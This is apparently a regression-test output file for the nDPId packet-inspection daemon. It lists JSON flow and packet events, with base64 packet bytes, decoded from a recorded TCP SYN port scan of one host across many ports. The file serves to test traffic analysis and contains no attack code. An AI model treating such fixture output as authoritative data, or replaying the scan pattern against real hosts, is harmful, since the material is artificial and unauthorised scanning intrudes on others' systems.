-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7oAADAGBLmsEAAIQA2GNIzSJxndUoMYAAAAAGACBAANdgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsWC0AADQGvEWsEAAIQA2GNIzSBEndUoMYAAAAAGACBAAwRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsBGsAACsGGQisEAAIQA2GNIzSJXndUoMYAAAAAGACEAADFgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvYYAACoGYOysEAAIQA2GNIzSBH\/dUoMYAAAAAGACDAAoEAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAstjcAADAGYjusEAAIQA2GNIzSEIDdUoMYAAAAAGACBAAkDwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg4AACoG7GSsEAAIQA2GNIzSwBjdUoMYAAAAAGACDABsdgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwMAACwGxW+sEAAIQA2GNIzSH0DdUoMYAAAAAGACBAAVTwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAstAkAAC0GZ2msEAAIQA2GNIzSBAPdUoMYAAAAAGACCAAsjAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsTbQAACwGzr6sEAAIQA2GNIzSAB7dUoMYAAAAAGACBAA0cQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cgAADkGOaqsEAAIQA2GNIzSFrPdUoMYAAAAAGACCAAZ3AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsDeoAACgGEomsEAAIQA2GNIzSCNTdUoMYAAAAAGACBAAruwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0UAACgGYS2sEAAIQA2GNIzSBbXdUoMYAAAAAGACBAAu2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADYGhnWsEAAIQA2GNIzSC7jdUoMYAAAAAGACDAAg1wAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsQLUAACgG372sEAAIQA2GNIzS7BvdUoMYAAAAAGACBABIcwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLgAADAG27qsEAAIQA2GNIzSINDdUoMYAAAAAGACBAATvwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq9EAAC0Gb6GsEAAIQA2GNIzSgBHdUoMYAAAAAGACCACwfQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsj8YAACsGjaysEAAIQA2GNIzSI5bdUoMYAAAAAGACEAAE+QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAs2tkAADEGPJmsEAAIQA2GNIzSFFDdUoMYAAAAAGACCAAcPwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsF\/IAADsG9YCsEAAIQA2GNIzSBBjdUoMYAAAAAGACEAAkdwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsowcAADcGbmusEAAIQA2GNIzSBpjdUoMYAAAAAGACEAAh9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsaSUAADEGrk2sEAAIQA2GNIzTEIDdU4MZAAAAAGACCAAgDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7UAADEGV72sEAAIQA2GNIzTBH\/dU4MZAAAAAGACCAAsDQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxvMAACgGWX+sEAAIQA2GNIzTJXndU4MZAAAAAGACBAAPEwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsgk8AADsGiyOsEAAIQA2GNIzTBEndU4MZAAAAAGACEAAkQwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uEAAC4GG5GsEAAIQA2GNIzTJxndU4MZAAAAAGACDAAFcwAAAgQFtA=="} 
